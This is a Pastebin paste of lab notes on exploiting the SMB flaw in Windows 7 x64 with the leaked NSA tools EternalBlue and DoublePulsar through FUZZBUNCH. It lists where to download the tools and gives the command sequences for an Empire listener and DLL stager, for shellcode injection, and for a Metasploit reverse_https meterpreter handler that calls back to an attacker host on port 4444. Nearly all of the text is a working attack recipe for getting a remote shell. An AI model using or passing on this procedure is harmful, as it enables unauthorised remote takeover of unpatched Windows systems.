Advertisement
anhkiet2507

NSA

Apr 27th, 2017
21,774
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.95 KB | None | 0 0
  1. Windows Server 2003: Attacker with FUZZBUNCH
  2. - Kali Linux 2016.2: Attacker with Metasploit and Emprite
  3. - Windows 7: Victim
  4. Exploit SMB Vul on Windows 7 x64 without user interaction
  5. Download Tool
  6. https://github.com/misterch0c/shadowbroker
  7. https://github.com/EmpireProject/Empire
  8. https://www.rapid7.com/products/metasploit/download/
  9. https://www.python.org/download/releases/2.6/
  10. https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
  11. https://notepad-plus-plus.org/download/
  12. Command
  13. + Winserver 2k3
  14. C:\Python26\Python.exe fb.py
  15. use EternalBlue
  16. use DoublePulsar
  17. +Kali Linux
  18. Empire
  19. listeners
  20. set Name Eternal
  21. set Host http://192.168.1.3
  22. set Port 8080
  23. execute
  24. usestager dll Eternal
  25. set Arch x64
  26. execute
  27. agents
  28. interact
  29. usemodule code_execution/invoke_shellcode
  30. set Lhost 192.168.1.3
  31. set Lport 4444
  32. execute
  33. Metasploit
  34. use mult/handler
  35. set PAYLOAD windows/meterpreter/reverse_https
  36. set LHOST 192.168.1.3
  37. set LPORT 4444
  38. exploit-j
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement